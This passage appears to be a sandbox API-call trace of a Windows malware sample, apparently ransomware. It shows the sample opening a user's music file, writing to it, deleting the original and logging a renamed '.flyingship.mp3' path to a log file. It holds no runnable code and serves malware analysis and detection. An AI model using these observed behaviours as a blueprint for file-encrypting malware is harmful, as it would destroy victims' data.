HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.394] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0188.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.394] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0188.410] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0188.410] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.411] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xhgr3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0188.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0188.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0188.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0188.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0188.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0188.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0188.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0188.414] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0188.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0188.414] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0188.414] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0188.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.414] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0188.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd8b8 [0188.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd8b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0188.415] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.415] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.415] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.415] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0188.415] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.415] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.416] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0188.416] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.416] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.416] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0188.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd858 [0188.416] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd858, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0188.417] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.417] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0188.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0188.417] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0188.417] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0188.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0188.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.417] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3", lpFilePart=0x0) returned 0x2d [0188.417] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b94ad0, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x17c989e0, ftLastAccessTime.dwHighDateTime=0x1d5da3a, ftLastWriteTime.dwLowDateTime=0x1587f340, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4bb8, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="xhgr3.mp3", cAlternateFileName="")) returned 0x90ae18 [0188.417] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\xhgr3.mp3")) returned 1 [0188.419] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6b94ad0, ftCreationTime.dwHighDateTime=0x1d5deab, ftLastAccessTime.dwLowDateTime=0x17c989e0, ftLastAccessTime.dwHighDateTime=0x1d5da3a, ftLastWriteTime.dwLowDateTime=0x1587f340, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x4bb8, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="xhgr3.mp3", cAlternateFileName="")) returned 0 [0188.419] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.419] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.420] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.421] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.421] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0188.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.421] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0188.422] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.422] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0188.422] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0188.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0188.423] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.423] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.423] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0188.423] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.423] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.424] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0188.424] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2a1f, lpOverlapped=0x0) returned 1 [0188.424] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0188.424] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x2a1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.424] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0188.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0188.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.flyingship.mp3\r\n", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0188.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3b) returned 0x8db180 [0188.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.flyingship.mp3\r\n", cchWideChar=59, lpMultiByteStr=0x8db180, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 